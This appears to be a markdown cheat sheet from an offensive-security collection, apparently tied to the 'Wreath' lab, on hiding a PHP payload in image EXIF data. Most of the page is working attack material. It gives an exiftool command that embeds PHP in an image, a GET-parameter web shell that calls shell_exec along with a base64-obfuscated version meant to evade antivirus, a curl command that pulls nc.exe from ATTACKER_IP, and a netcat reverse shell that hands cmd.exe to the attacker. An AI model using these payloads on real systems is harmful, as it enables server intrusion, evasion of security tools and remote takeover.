killchain-compendium/exploit/web/php/php_image_exif.md

909 B

PHP Payload in Image ExifData

  • Test
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
  • Build Payload with AV evasion
<?php
    $cmd = $_GET["wreath"];
    if (isset($cmd)){
        echo "<pre>" . shell_exec($cmd) . "</pre>";
    }
    die();
?>
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
  • Upload and execute commands with get parameter ?wreath=systeminfo

Uploading Reverse through Webshell

  • Parameter for Webshell
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
  • Trigger uploaded netcat
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe